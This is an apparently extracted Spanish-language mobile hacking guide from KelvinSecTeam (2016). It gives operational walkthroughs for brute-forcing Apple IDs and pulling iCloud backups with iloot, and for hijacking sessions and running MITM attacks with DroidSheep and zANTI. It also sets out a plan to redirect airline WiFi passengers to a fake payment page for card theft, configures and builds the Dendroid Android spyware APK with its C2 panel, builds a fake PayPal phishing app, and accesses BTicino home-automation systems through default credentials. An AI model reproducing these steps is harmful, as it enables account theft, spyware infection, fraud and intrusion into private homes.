Вы находитесь на странице: 1из 71

Autor: kelvin parra

Grupo De Trabajo: KelvinSecTeam

Escrito: 25-08-2016
1 DEFINICION:
Este nuevo articulo completo de seguridad mobil consiste en visualizar los riesgos y aplicar tecnicas de
hacking mobile desde un celular donde existen distintos y multiples metodos de la seguridad del mobil
en tecnicas de explotacion, herramientas y definiciones que ayudaran a entender cada paso de los
metodos que explicaremos y en algunos casos proteccion mobil.

Black hat hacking “hacker de zombrero negro” : En el blackhat hacking en seguridad mobil se define de
“hackers” con propositos malignos con fines de investigacion y exponer la vulnerabirilidad para darle una
ventaja al pirata inforamtico utilizar la tecnica o vender esta tecnica llamadas “0day” en el sitios
DarkNets por un cambio de bitcoin.

Research Security “Investigador De Seguridad” : En este caso solo se basaria en indentificar el erorr y en
algunos casos explotar la vulnerabirilidad con fines de reportar la vulnerabirilidad y llevarla a algun
soporte tecnico de la empresa para que arregle el problema presentado por el investigador de seguridad.

Area De Trabajo:

Redes: C onsiste en el estudio o del uso automatizado de herramientas para testear redes WPA o WPA2.

Aplicación Web Security: Este es el que lleva el cargo de testear y buscar vulnerabirilidades web.
2 SEGURIDAD IPHONE:

Ante la variacion entre el uso de iphone o android la mas afectada es android aunque queremos
incorporar la seguridad iphone para dar una detallada explicacion sobre de lo que se trata “Seguridad
mobil” y se efectua en cualquier sistema operativo.

Rasgos De Seguridad:

1) Red De Comunicación
2) Reverse Engginer
3) Privacidad
4) Esquemas De direcciones
5) Notificaciones De Inserccion
6) Almacenamiento De Datos De La Aplicación

Los hackers son aquellos que buscan investigar estos rasgos ahora lo compartimos y
comerciamos a usuarios que quieren aprender y pueda ser una ayuda o una guia para la
motivacion a otro usuarios seguir investigando y buscar nuevos metodos.
3 JAILBREAK EN IPHONE

Definicion:
Jailbreak nunca fue permitido por las empresas pues personas han creido que el Jailbreak es
un metodo que fue aceptado vor las empresas para permitir la ejecucion de cualquiera
aplicación en el dispotivo de ubicación externa es decir como por ejemplo la descarga de
malware en portales webs y hacer estas “Supuestas” aplicacioens ejecutables.

Herramienta Automatizada:
Todo surgio en un exploit y conjunto de terminales el duscubrimiento de un fallo de seguridad
que permitia hacer una funcion que no permitia tanto Iphone Y Android pero ahora con el
estudio de la logica del rompimiento de la seguridad y la ayuda de programadores con
pensamiento hacking han desarrollado variedades de herramientas para realizar el jailbreak
automatizado desde un software que puede correr en distintos sistemas operativos de tu
ordenador.

Herramientas a utilizar durante jailbreak Iphone:


1) Pwnage Tool 2) JailBreakMe 3) Greenpois0n
4 EMPEZAR JAILBREAK CON PWNAGE TOOL

Categoria De herramientas automatizadas para jailbreak:

Pwnage Pwnage: En conjunto para hacer jailbreak al iPhone, iPod touch , y el iPhone 3G.
ARM7 Go (de iOS 2.1.1) : por jailbreak tethered en el iPod touch 2G.
Limera1n Exploit :T ethered jailbreak para el iPhone 3GS, iPod touch 3G, iPad, iPhone 4, iPod
touch 4G y Apple TV 2G.
usb_control_msg Exploit : también conocido como "steaks4uce para jailbreak tethered en el
iPod touch 2G.

Recomendación de pagina: https://www.theiphonewiki.com/wiki/Jailbreak_Exploits

Gracias a Theiphonewiki por dar soporte a los exploits de cada version en Iphone y vamos ahora
a utilizar estas herramientas y definirlas:

Versiones que permite realizar Jailbreak PwNAGE TOOLS:


Pwnage Tool:

Es una herramienta de jailbreak iOS para Mac OS X que fugas de por crear un IPSW. Se le
permite cambiar logos de arranque y añadir paquetes pre-instalado para el IPSW. Una vez
creado un IPSW que se puede utilizar para restaurar a través de iTunes.

Disponibilidad: Windows Y MAC

Pwnage: http://blog.iphone-dev.org/post/1359246784/20102010-event
Firmware: http://www.felixbruns.de/iPod/firmware/

Una vez descargado tanto el Pwnage Y Firmware ejecutamos el “Pwnage” y nos aparecera
como a continuacion:
Ahora debes clicekar en un modelo:

Seleccionamos:

Ahora nos saldra un opcion de busqueda de la IPSW para los que no saben que es un fichero
IPSW es u fichero que sirve para restaurar Tu iPhone o Ipad, Ipod.
Seleccionamos el IPSW:
Ahora nos saldra un menu

Ahora vamos a Cydia Packages y una vez dentro de esa opcion del menu presionamos en
“Refresh”

Ahora seleccionamos 1 del listado “Open SSH” y presionamos en en la flechita “Azul” que se
encuentra en la parte inferior derecha.
Selecciona en build y presionamos en la flechita azul de nuevo.

Ahora presionamos en “SAVE” y comenzara a aplicar la accion de construccion del firmware.


Ahora por ultiimo nos dara un mensaje donde dice “Conecto El Dispositivo” y Active En Modo
DFU.

Conectamos el dispositivo y activamos el modo DFU.

Y Jailbreak Completo.

Informacion: Este es el metodo automatizado del jailbreak en un dispositivo Ipod , Iphone,


Ipad.

Promesas De Jailbreak ante Iphone:

1) Jailbreak – Permite instalar cualquiera otra aplicación externa.

2) Jailbreak – tiene como significado saltar la seguridad del dispositivo y obtener privilegios.
5 IPHONE BACKUP & ICLOUD:
Un dia publicamos en kelvinsecurity el metodo automatizado de usar y obtener por medio de
una herramienta ejecutada en el lenguaje de programacion python que aplica la siguiente
funcioens:

1) Permite lanzar ataques de fuerza bruta a cuentas de Apple


2) Permite obtener la backup de una cuenta de Icloud.
Direccion de descarga: https://github.com/hackappcom/iloot
1) Herramineta iloot permitiria extraer la backup de una cuenta de Apple

Requisitos:
Sistema operativo: Linux o windows
Python 2x
Instalacion:
pip install -r requirements.txt

ejecucion inicial y lista de comandos:

python iloot.py -h
usage: iloot [-h] [--threads THREADS] [--output OUTPUT] [--combined]
[--snapshot SNAPSHOT] [--itunes-style]
[--item-types ITEM_TYPES [ITEM_TYPES ...]] [--domain DOMAIN]
[--keep-existing]
apple_id password

Necesitas el (Usuario – Contraseña de la cuenta Apple)


apple_id Apple ID
password Password

Ejecucion en la terminal: iloot.py email password

 Transcurso de la sesion -

Ahora nos da el siguiente mensaje:

“Quiere usted descargar el libro de direcciones, mensajes y fotos”


Si => (Yes)
Y asi de automatizado funciona la herramienta.
Ficheros Y Su Contenido:

AddressBook.sqlitedb información de contacto y datos personales


como nombre, dirección de correo
electrónico,
cumpleaños, organización, etc ...
AddressBookImages.sqlitedb imágenes asociadas con los contactos
guardados
Call_history.db entrante y registros de llamadas salientes,
incluyendo números de teléfono y
marcas de tiempo Mensajes de texto y
multimedia
com.apple.accountsettings.plist datos sobre todas las cuentas de correo
electrónico que se configuran en el
Aplicación de correo electrónico de Apple
com.apple.network.identification.plist datos de la red inalámbrica, incluyendo la
dirección IP, la dirección IP del router,
SSID y marcas de tiempo
consolidated.db Tiendas GPS los datos de seguimiento
Voicemail.db Mensajeria De Voz

Existe otra herramienta y es la de fuerza bruta por que muchas vecess hemos notado distintos
tipos de seguridad pero no hemos visto uno que “Salte la autentificacion” y entre de
inmediatamente a los correos de apple en ese caso existen 2 funciones que podemos usar para
lanzar el ataque.

1) Por fuerza bruta: la fuerza bruta se podra utilizar desde una herramineta automatizada
en lenguaje python o desde un portal web desarrollada en PHP y con el uso de un
diccionario de contraseñas normalmente se utilizar el ataque de fuerza bruta por que
“Apple” no bloquea los intentos de acceso en caso a una direccion IP.
2) Preguntas De Seguridad: Hemos notado preguntas de seguridad debiles para los
amantes del doxing se les ara facil y es que las preguntas de seguridad suelen ser algo
sencillas en cuanto las preguntas mas facilitadas como “En que ciudad nacio tu madre” o
“el nombre de tu perro” ect.

6 APLICACIONES PENTESTING

Existe una gran variedad de herramientas de pentesting que puedes ejecutarla en tu android
son aplicaciones que necesitan que tu telefono se encuentre roteado para tener los permisos
necesarios para empezar a realizar las funciones como las siguientes:

1) Scanneo y identificacion de dispositivos en una red


2) Scanneo y visualizacion del trafico en la Red Wifi
3) Realizar Ataques MITM
4) Scanner de puerto
5) Conexión a puertos y identificar
6) Sacar informacion de un host
7) Ataques DoS
8) Auditacion de password y aplicación de direccionarios para fuerza bruta
9) Establecer conexiones remotas

Puerto Scanner: Se encargar lanzar un mapeo de los puertos entre ellos lo mas conocidos
dentro de una IP local o de un servidor entre los puertos se encuentran los mas conocidos y son
los puertos 8080 :80 .5900 .21 .23.
Ataque MITM: El Man-in-the-middle que consiste en que el atacante se interpone entre el
cliente y el servidor. Con este ataque demostraremos como se pueden obtener credenciales en
una conexión segura.

Ahora vamos a sniffear la red con una aplicación llamada droidsheep es utilizada en android:
Direccion De Descarga: http://droidsheep.downloadxapp.com/

7 ROBAR SESIONES CON DROIDSHEEP

Bueno antes que todo hay que estar conectado a una red wifi y empezar a scannear desde la
aplicación android DROIDSHEEP existen un nivel entre DROIDSHEEP y ZANTI y es que ZANTI se
encuentra mejor personalizada y con mas opciones.

Secuestro De Sesion:
Sólo hay un cliente dentro de la red inalámbrica que se es el único que envía y recibe paquetes
Una petición HTTP envía será recibido por el punto de acceso inalámbrico y, usando
enrutamiento TCP / IP, el paquete será enviado al servidor web. Si la red inalámbrica está
activada la seguridad (por ejemplo, usando WPA-2 y una clave fuerte), un atacante no es capaz
de leer cualquier paquete HTTP y por lo tanto no puede robar identifica la sesión del usuario.
con sólo escuchara la red.

Capturando Sesiones:
La herramienta tiene 2 opciones y es el sistema esta automatizado para indetificar aquellas
paginas sobre “HTTP” se encuentra con 2 opciones solamente “START” y “STOP”.
Aca hay un problema y es que los ataques MITM “Mitiga” cuando facebook establece su cifrado
seguro de sesiones y implementa el “Https” dejando a ataques como MITM sin poder realizar la
captura de sesiones por lo tanto este solo debie empezar a capturar sesiones sobres los
problemas de certificados SSL y durante la web se encuentre en http.

Para abrir una sesion solamente debemos es clickear sobre una y saldran 3 opciones y vamos la
opcion de abrir pagina normal.

Una vez ya deberiamos estar observando dentro de la aplicación la sesion:


DroidSheep utiliza su programa nativo para capturar paquetes. Esta programa nativo utiliza
libpcap, una biblioteca de acceso a la red proporcionada por el núcleo y por defecto incluido en
cualquier distribución androide. DroidSheep utiliza estas funciones proporcionadas por libpcap:

Nombre De Funcion: Descripcion:


pcap_lookupdev función de búsqueda para la interfaz de red
por defecto en el dispositivo.
pcap_lookupnet d eterminar la dirección de red y la máscara
de subred del dispositivo
pcap_open_live escuchar paquetes recibidos por el
dispositivo
pcap_compile Compila una expresion de un filtro
pcap_loop Inicia un bucle sin fin escucha de paquetes y
llamadas método de devolución de llamada
para cada paquete capturado
pcap_freecode Desasigna la memoria para el compilado
pcap_close Cierra de captura de la sesion
8 COMO UTILIZAR - ZANTI

Zanti: Es una herramienta que pocos utilizan y los expertos de seguridad informática la
utilizan a menudo en sus celulares con tecnología “Android” para detectar todo tipo de
redes y robar contraseñas además de desafiar al servidor escaneando puertos y
reconociendo dispositivos como “Impresoras” , “Celulares blackberry” , “Android” ,
“WindowPhone” , “Routers” y cualquier otra tecnología conectada a una red y con sus
puertos abiertos facilitando al pirata realizar acciones que puedan perjudicar al usuario
conectado a una misma red.

Descargar Aplicacion:

Zanti: tiene 2 opciones la premium y la free , obviamente para el usuario como tal
pueden descargar la free por medio del vinculo:

https://www.zimperium.com/zanti-mobile-penetration-testing donde deberán llenar datos


como su dirección de correo electrónico y clickear en “Dowload”.

Root En Android:

El celular debe estar rooteado para darle los permisos necesarios que necesita la
aplicación para utilizar nuestro celulares y empezar a auditar todo tipo de redes
además de vulnerar otros dispositivos.
DESPUES DEL ROOT:

Ahora podemos utilizar “ZANTI” abrimos la aplicación “recuerda que debemos estar en
una red WIFI, conectado”

Una vez instalado zanti y ejecutado además de conectarnos a una red “WIFI” donde
muchas personas estén conectadas en este momento sean ordenadores o celulares,
nos muestra una lista de direcciones IPS asignadas además de su dirección “MAC” ,
además podemos visualizar los “Logos” o “Icons” de cada dispositivo donde
encontramos laptops y celulares conectados a continuacion..
VISUALIZANDO UNA VICTIMA:

•Clickeamos en nuestra primera victima y se trata de un “Modem” en que estamos


conectados por la dirección por defecto de configuración podría ser la “192.168.0.1 o
192.168.1.1” pero el problema general serian los puertos podemos realizar una fuerza
bruta para buscar los puertos en caso que el puerto “80” que nos permite visualizar por
medio de una plataforma web este desactivado posiblemente tenga el puerto “443” que
también nos permitiría visualizarlo entonces la herramienta nos ayudaría a buscar esos
puertos, en la opcion “Password Complexity Audit”.

BUSCAR EL PUERTO PERFECTO:

Dejamos el “Automatic Mode” en “ON” y dejamos el cracking method en


“Small Dictionary” y luego presionamos en “GO”.
VER LOS PUERTOS Y CONTRASEÑAS POR DEFECTO:

Ahora que nos muestra los puertos sabemos 3 tipos de conexiones seguras pero
posiblemente “Protegidas por una contraseña por defecto o modificada”, ahora por
medio del puerto “21” significa manipulación de logs o ficheros del modem, por el
puerto 23 conexión al menu y configuración del modem, y por medio del puerto 80 y
443 podría ser que el modem este protegido o quizás no, la herramienta también tiene
una capacidad de realizar un ataque de fuerza bruta para descifrar la contraseña por
defecto.

ACCEDIENDO POR DEFECTO:

Las contraseñas por defecto de un modem podrían ser una vez conectado a la red
puerto 80 podría lanzarnos 2 tipos de autentificación 1) Www-authenticate 2) formulario
de “Usuario y Contraseña” simple.

Contraseñas por defecto: admin:password admin:Sin_Contraseña admin:admin


user:12345 admin:123456 admin:123 administrador:123456

TIPO DE AUTENTIFICACION:

“2002 OK” > se carga sin ninguna autenticación.


“401 Unauthorized”> pancartas con WWW Authenticate indicar un nombre de usuario y
contraseña

La autenticación es posible, pero aún no se logra, a diferencia de "403 Forbidden”


,Algunas
banners anuncian por defecto.

AVISO DE CONTRASEÑAS AL PUBLICO MEDIANTE UN HTTP TRACER:

•Este caso se ve mucho y es que cuando nos conectamos a una dirección IP de un modem
o producto o router nos lanza la contraseña por defecto sin tener que estar aplicando la
fuerza bruta con “ZANTI”, password:1234 y como usuario ninguno.

ATAQUE MITM:

Es un ataque en el que se adquiere la capacidad de leer, insertar y modificar a


voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace
entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar
mensajes entre las dos víctimas.
Ataque Man-in-the-middle Con Zanti
Zanti tiene una opción de ataque main in the middle que permite que tu veas las
sesiones que tiene tu victima en facebook, twitter o yahho amazon ect.

9 COMO UN HACKER PUEDE VINCULAR PHISHING CON ZANTI

EL TEMA DE QUE HABLAMOS ES LA PROVEEDORA DE INTERNET "GoGo -


WIFI" UNA EMPRESA YA INSTALADA EN DIFERENTES AEREOLINEAS YA
HABLAMOS ANTERIORMENTE EN OTRO DE MIS BLOGS DE "KELVINSECTEAM"
EN QUE EXPLICA VAMOS QUE TAMBIÉN PUEDE SER UTILIZADO
PARA FINES TERRORISTAS INVOLUCRANDO A OTROS CIUDADANOS
CONECTADOS A UNA MISMA RED. TAMBIÉN HE VISTO OTRO VIDEO LLAMADO
"WIFI-GOGO HACK" DONDE UNA PERSONA SEGÚN EL O ELLA HA DESCUBIERTO
UNA MENERA DE BYPASSEAR "SALTEARSE" LA PETICIÓN DE CREDENCIALES O
MAS BIEN EL "PAGO EN LINEA DESDE LA WEB GOGO".

Mapa De técnica:

1 - (abrir zanti) =>

2 - (Opcion De Redireccion) =>


3- (ingresar ejemplo: www.tuphishinpayment.com)

4- (cualquier usuario conectado a la red wifi será redireccionado al phishing al abrir su


navegador en su mobil o Tablet)

MUY BIEN UNA VEZ MONTADOS EN EL AVION VAMOS A BUSCA UNA RED "WIFI"
NOS ENCONTRAMOS CON LA DE GOGO SE ENCUENTRA LIBERADA PERO TIENE
RESTRICCION DE NAVEGACION UNA DE LAS COSAS QUE QUIERO DECIR ES
QUE NO HE TENIDO LA OPORTUNIDAD PARA YO "AUDITAR" EN VIVO Y EN
PERSONA A "GoGo" EN UNA AEREOLINEA COMO ES AMERICAN AIRLINE.

BIEN EL PROBLEMA DE SEGURIDAD PODRÍA SER EL SIGUIENTE:

1) AL PESAR QUE NO TENEMOS FORMA ALGUNA DE NAVEGAR NOS


ENCONTRAMOS CONECTADOS.

2) PODEMOS USAR UN ATAQUE "MAIN IN THE MIDDLE" Y ROBAR


CREDENCIALES DE PERSONAS QUE VIAJAN ATRAVES DEL MISMO AVION.

3) POSIBLEMENTE EXISTEN UN MÉTODO DE CREAR UN "FALSO PAYMENT" UN


FALSO SISTEMA DE PAGO CREAR UN SCAM DESDE NUESTRO ORDENADO
LUEGO SUBIRLO A UN SERVIDO Y UTILIZAR UNA HERRAMIENTA AUTOMATIZADA
COMO "ZANTI" PARA REDIRIGIR TODO USUARIO EN EL AVION CONECTADOS A
LA RED WIFI A UN FALSO VINCULO DE PAGO DE LA AEREOLINEA Y GOGO.
--- EL CATALOGO DE PAGO POR SERVICIO --

ESA ES LA RESTRICCIÓN DE NAVEGACIÓN A OTRAS DIRECCIONES URL.

PROBLEMAS

1) NO PUEDES NAVEGAR POR OTRAS DIRECCIONES PERO SI TE POPORCIONA


INTERNET
2) TE EMITE MÉTODOS DE PAGO PARA VER PELÍCULAS EN LINEA

VENTAJA:

PUEDES REALIZAR EL ATAQUE MITM SIN POBLEMAS UNO DE LOS PROBLEMAS


DE GOGO SU PAGINA NO TIENE HTTPS ES DECIR NO SE PROTEGE POR UN
CANAL SEGURO CIFRADO POR LO TANTO EL HTTP TE HACE MAS VULNERABLE
A CUALQUIER VULNERABILIDAD.
UNA DE LAS DESVENTAJAS ES QUE LA MAYORIA DE LA PAGINA YA ESTAN
UTILIZAN EL "HTTPS" Y POR LO TANTO NO SUELE SER TAN CASUAL LANZAR UN
ATAQUE MITM EN QUE TE GESTIONE CREDENCIALES EMAIL - PASSWORD DE
UNA PAGINA SOCIAL COMO FACEBOOK O TWITTER O GMAIL.

OFREZCO LA HERRAMIENTA "ZANTI" PARA ANDROID DONDE PUEDES


REALIZAR UN ATAQUE MITM ADEMAS DE OTRAS OPCIONES.

SI TE LO BAJAS EN TU TABLET PUEDES ACTIVAR EL MITM EN ESTA OPCION DE


ESTA HERRAMIENTA ROBA CREDENCIALES DE CIERTAS PAGINAS DE
CUALQUIER TIPO DE DISPOSITIVO CONECTADO A LA RED:

- FACEBOOK - TWITTER - AMAZON - GMAIL - INSTAGRAM ECT..

MAS ABAJO TENEMOS EL REDIRECT HTTP ES EL QUE NOS CONVENZE MAS YA


QUE RECUERDA QUE LA PAGINA PRINCIPAL: http://www.gogoair.com SE
ENCUENTRA HTTP Y ESO NOS HACE LA FACILIDAD DE CREAR UN SCAM LUEGO
SUBIR A UN SERVIDOR Y LUEGO UTILIZAR LA HERRAMIENTA DE ABAJO
LLAMADA REDIRECCT HTTP Y INCLUIR NUESTRA DIRECCION DE SCAM Y
LLEVANDO A NUESTRAS VICTIMAS A UN VINCULO FALSOS PARA CAPTURAR
LAS CREDENCIALES DE TARJETAS DE CREDITO.
10 VIRUS Y TROYANOS ANDROID

En realidad la mayoria son troyanos y cumplen algunos la funcion de infectar tu sistema


operativo android de tu celular o tablet con la finalidad de espiar y capturar contraseñas que
son enviadas a un servidor y este servidor a un cliente el cual es el atacante.

Android Malware:

Catacteristicas:

1) utiliza root exploits


2) varia entre mas de 50 apps en la
tienda
DROIDDREAM 3) instala aplicaciones segundarias

Caracteristicas:

1) Funcion Virus bancario

Spitmo - zeus
Caracteristicas:

1) Utiliza 3 exploits
2) Una backdoor
3) Envia Mensajes Troyanizados
Obad - Troyano

Caracteristicas:

1) Infecta A dispositvos por medio de 1


aplicación generada
2) Puede ser manupulado por medio de
un servidor con plataforma
Dendroid -- Troyano administrativa.
3) Graba Audio y Video del dispositivo.

Funciones De Troyanos:
1) GPS
2) Grabaciones de audios
3) Mensajeria y Trafico de correo electronico
4) Visualizacion de fotografias
5) Registro de llamadas

Pero no existen solo troyanos con fines malignos o comerciales en sentido del blackhat
hacking tambien existen otros que en sus portales webs han publicado que estas
aplicaciones serian una ayud para para proteger a sus hijos y monitorear empleados.
Y que nos ofrece:

En el panel administrtivo para aclarar las funciones:


11 COMIENZOS CON DENDROID

Introduccion:

DENDROID es una herramineta que funciona con fines de espionaje que se utiliza para
infectar a dispositivos android este suele tener una guia de instalacion ademas tambien se
encunetra libre el codigo para ser modificado e instalado.

Funciones que cumple DENDROID:

1) Almacena el historial de llamadas del dispositvo infectado


2) Envia mensajes y borra mensajes de la victima
3) Visible la lista de contactos del mobil infectado
4) Graba Audios Y Video
5) Tiene la capacidad de enviar mensajes a todos los contactos
6) Tiene un modo de interceptacion
7) Visualiza los mensajes que llegan y se envian
Requisitos:

1) Disponer de un servidor preferiblemente acceso al Cpanel donde podras interactuar con


el “phpmyadmin” “mysql” y Almacenar los ficheros de DENDROID en php.
2) JAVA SDK para la modificacion del codigo java de DENDROID

Instrucciones de descarga:

1) Vamos al sitio de github donde se encuentra totalmente liberada:

https://github.com/nyx0/Dendroid y donde clone or dowload presionamos y clickeamos en


DOWLOAD ZIP.
Ahora visualizaremos lo que hemos descomprimido del ZIP:

En total son 3 carpetas y la que instalaremos en nuestro servidor web es Dendroid Panel alli se
encuentra los scripts PHP.

Ahora como podras observar entramos a la carpeta y ahora te dire cual carpeta esta los script
PHp y estna en “PANEL” y en “Other Files” se encuentra el fichero .sql que importaremos en
PHPMYADMIN.
Bien ahora vamos a ver lo que la carpeta panel nos tiene

Y vamos a editar las siguientes estas las agregaremos los datos de la base de datos que vamos
ha crear y modificar las direcciones URLs.
applysettings.php
blockbot.php
clearawaiting.php
clearmessages.php
deletebot.php
deletefile.php
deletepics.php
functions.php
table.php
bien ahora aparecera esta direccion en algunos ficheros:

Si tenemos el dominio “pizzachip.com” que es un ejemplo que viene por defecto en los ficheros
tendiramos que cambiarlo por la direccion de nuestro servidor exactamente donde hemos
subidos los ficheros.

Podificamos el $url = www.pizzachip.com”; por $url =”www.tuweb.com”; bien agregas la


direccion web donde has sibido los ficheros.
Ahora vamos a modificar en otro lugar de algun fichero en PHP el keylimepie eso dira en los
ficheros siguientes:
get.php
get-functions.php
new-upload.php
upload-pictures.php

lo cual cuando diga “keylimepie” a “password”.

 Saldra esa misma forma “keylimepie” lo cual modificaremos por “password”.


Esto fue algo de lo que modificamos pero aun asi falta crear una base de datos y en esa base de
datos un usuario para ingresarlo en en los codigos en “PHP” que tenemos para luego de esa
forma establecer una conexión MySQL entre la base de datos y los PHP scripts que hemos
ingresados.

1) Ahora vamos a Cpanel


2) Luego iremos a craer una base de datos y nos aparecera algo asi todo depende del tipo
de estilo o version de cpanel:

- Antes que todo crear la base de datos primera mente y luego crear el usuario para la
base de datos-

- Ahora creamos un usuario para la base de datos-


Una vez de haber creado el usuario le asignaremos los privillegios:

Bien ahora el siguiente proceso es ir al “PHPMYADMIN” e importar la base de datos .SQL que se
encuentra en la carpeta de “OTHER Files”
Iremos a phpmyadmin escogemos una base de datos que hemos creado y seleccionamos ahora
arriba en la parte superior derecha => nos dice IMPORTAR Clickeamos Alli y seleccionamos
donde se encuentra el fichero y subimos el fichero luego se creara las tablas como la imagen
que observamos en la imagen de arriba.
Ahora cuidado! Por que creamos la base de datos y usuaro pero no hemos asignado a cada una
de ellas a el script PHP te aconsejo revisar cada PHP y ver si dispone de lo siguiente:

Como en el fichero config.php

$dbhost='Aca Pondras El Servidor MYSQL';


$dbname='El nombre de la base de datos';
$dbuser='El usuario Asignado durante la creacion de la base de datos';
$dbpass='La contraseña tambien asignada durante la creacion de la base de datos';

bien revisamos cada fichero haber si encontramos los datos que presentamos y que es
importante tener en cuenta estos datos para la conexión entre el script y la base de datos.
Por ultimo deberas subir los ficheros en tu servidor ejemplo que el servidor que estes
trabajando sea:

www.android.com subiremos los ficheros en ese enlace utilizando el cliente de zimbra y una vez
que lo subas ya estaria listo para entrar al “SETUP” en el cual asignaremos un usuario y
contraseña:
Ahora no que mas que decir que darle en begin setup

Agregamos los valores de 10 en la parte <= izquierda en la derecha agregamos como esta en la
imagen agregamos un usuario y contraseña y presionamos en el boton verda de la parte inferior
derecha.

Una vez ya habra sido completado el proceso.


Luego finalizamos y entramos de nuevo en la parte principal y agregamos las credenciales de
login:

“usuario y contraseña como hemos escogido”

Luego listo podemos entrar al panel administrativos de adminsitracion de troyanos.


Configuracion del software:

Bueno ahora para la configuracion en esta parte deberemos tener ECLIPSE y tambien SDK
android.

Abrimos eclipse:
 File
 Import

ahora debemos especificar la carpeta de projecto que tenemos llamado Dendroid APK.
Ahora especificamos que ya es un projecto existente.

Hubicamos la carpeta y clickeamos en aceptar.


De igual manera aca finalizando.

Bueno ya una vez abierto el projecto en la parte <= izquierda observaremos los ficheros que
podemos modificar:
Bien de igualmanera podemos modificar los scripts a continuacion borraremos variables las
variables se encuentra en DroidianService.java, dentro del paquete com.connect y en la carpeta
src.

Llamados: encodedURL, backupURL y encodedPassword


El valor de las variables lo borramos y lo dejamos como la imagen a continuacion:

Tambien observaremos lo siguiente y son encodedURL, backupURL y encodedPassword que se


encuentran en bse64.
Luego entramos a la pagin http://crypo.in.ua/tools/eng_base64c.php que es una herramienta
para cifrar y decrifrar ahora nos tocara cifrar la direccion de nuestra pagina web donde subimos
los ficheros e instalamos.

Ahora presionamos en Encrypt:


Ese String, es que tendremos que poner como valor a las variables encodedURL y backupURL.

Para la variable encodedPassword repetiremos el mismo paso, pero esta vez deberemos de
cifrar la contraseña que pusimos a la hora de crear nuestro panel de control (aquella que
cambiamos el valor de keylimepie luego nos quedra como en la imagen de arriba.

Ahora presionamos en file y “Export”.


Ahora indicamos que quermeos la aplicación APK

A continuacion damos en siguiente luego nos saldra lo siguiente:


- Si ya tienes una contraseña presiona en “Create new keystore” luego en siguiente.

Llenamos el formulario

Para culminar seleccionamos una carpeta donde queremos guardar la APK:


Y listo tendremos nuestra APK lista para infectar a dispositivos:
12 APP INVENTOR CREANDO FAKE APP

App inventor es un projecto de la universidad MIT para que sus estudiantes aprendan de crear
aplicaciones de forma sencilla y lo mejor de ello es que te permite la descarga directa de la .apk.

Lo que se quiere hacer acá es impulsar el método de crear un phishing y hacerlo ejecutable desde el
dispositivo android normalmente la aplicación no mostrar la dirección “web” desde donde nos
conectamos y es una ventaja.

 App inventor => crear un “iframe” con el vinculo falso de la pagina “Phishing”
 App Inventor => utilizar un falso logo de una web bancaria o cualquier otra payment

Instrucción:

1) Vamos a app inventor 2 > http://ai2.appinventor.mit.edu/

Creamos un projecto
Una vez ya podremos editar y agregar lo que tendrá nuestra aplicación:

En la parte inferior => derecha encontraremos con

Title: donde agregare ejemplo “paypal” que es el titulado donde dice screen 2 en la imagen que
observas arriba.
Ahora arrastraremos en la parte <= izquierda en el menu al llamado “WebViever” este lo
arrastramos hasta la pantalla

En la parte derecha superior colocamos estos 2 en full parent y mas abajo en “HomeUrl”
colocamos la direccion de nuestro phishing de paypal.
Ahora en componentes clicekamos en screen2. Y ahora vamos a agregar el logo:

En esta parte subimos una imagen cualquiera de paypal. Una vez ya terminado todo esto
podemos compilar la aplicación falsa de paypal nuestra victima ejecutara la aplicación y de
inmediato le pedira las credenciales tal como especifica tu phishing.

Presionamos en BUILD y generamos la App en APK y listo tu APK falsa de paypal.


13 COMUNICACIÓN ANDROID CON DISPOSITIVOS DOMESTICOS

Existen multiple aplicaciones que permiten tener control sobre distintos aparatos domesticos
que pueden funcionar por una comunicación Wireless y muchos de ellos tambien pueden ser
controlados por medio de un servidor con plataforma que podemos observar graficamente uno
de los productos que conosco mas es Btcino durante las primeras pruebas de kelvinsecurity
teniendo un remoto control sobre todo un hogar muchos clientes de esta empresa han
notificado que algo extraño pasa en su hogar.

Lo encontramos disponible para “Android” aunque su conexión via WIFI podria ser esta y no una
conexión con peticion de credenciales como “User: Password:” como es la de btcino
generalmente en un servidor con plataforma.
_bien vamos con los detalles del producto automatizado:

„La gestión de la iluminación , El accionamiento de persianas y/o cortinas eléctricas,


ventiladores, aspiradores, etc

_estadísticas de servidor:

HTTP/1.1 302 Found


Date: Sat, 23 Jul 2016 15:14:35 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/1.0.0d PHP/5.1.6
X-Powered-By: PHP/5.1.6
location: /iden.php
Content-Length: 0
Content-Type: text/html

Infraestructura:

POR   MEDIO   DEL   TOUCH   EL   OPERADOR   PODRÁ   REALIZAR   LAS   MISMAS


ACCIONES QUE REALIZARA UN HACKER POR MEDIO DE UN SERVIDOR.

HACKER AUDITANDO EL SISTEMA:

1)   RESPECTO   AL   SERVIDOR   SU   ENTRADA   A   LA   PLATAFORMA   DONDE   NOS


PIDE LAS CREDENCIALES POR MEDIO DEL PUERTO 80 SI HACEMOS UN URL
FUZZ   VEREMOS   QUE   NO   NOS   PROPORCIONARA   INFORMACION   CLARO   NOS
LANZARA UNOS CUANTOS DIRECTORIOS "INDEX OF" DONDE ESTA VINCULADO
EL CONFIG ­ INSTALL ECT PERO NINGUN FORMATO SERA VISUALIZADO.
2)   LAS   CREDENCIALES   SUELEN   SER   MUY   SENCILLAS   TE   TRAEMOS   UN
LISTADO DE CONTRASEÑAS DEBILES Y CREEMOS QUE SON LAS MISMA QUE
SE LE AGREGAN A BTICINO EN SU VERSION ANTIGUA.

>USER:USER   >USER:123456  >ADMIN:ADMIN >ROOT­123456

DIRECTORIOS:

Directories HTTP Code HTTP Reason
/javascript/ 200 OK
/lib/ 200 OK
/styles/ 200 OK
/language/ 200 OK
/img/ 200 OK
/cgi­bin/ 403 Forbidden
­­ SISTEMA DE CONTROL ­­

shodan:  location: iden.php

PROBLEMA PRINCIPAL Y VENTAJAS DE UN PIRATA:

1) LA CONTRASEÑA DE FABRICA POR DEFECTO ES ADMIN:ADMIN ENTONCES
AUNQUE   SE   LE   AGREGUE   UNA   CONTRASEÑA   ASIGNADA   LA   ADMIN;ADMIN
SERA APROBADA COMO USUARIO CON PRIVILEGIOS.

2) CUALQUIERA QUE ENTRE A ESTE SISTEMA PODRIA TENER CONTROL DE EL
HOGAR   E   INCLUSO   LLAMADAS   DE   ESPERA   TAMBIEN   LA   ILUMINACION
PERSIANAS COMO LO HEMOS DICHO.
ESA   FUE   LA   CONTRASEÑA   Y   AUN   ASI   ENTRAMOS   CON   "ADMIN:ADMIN"
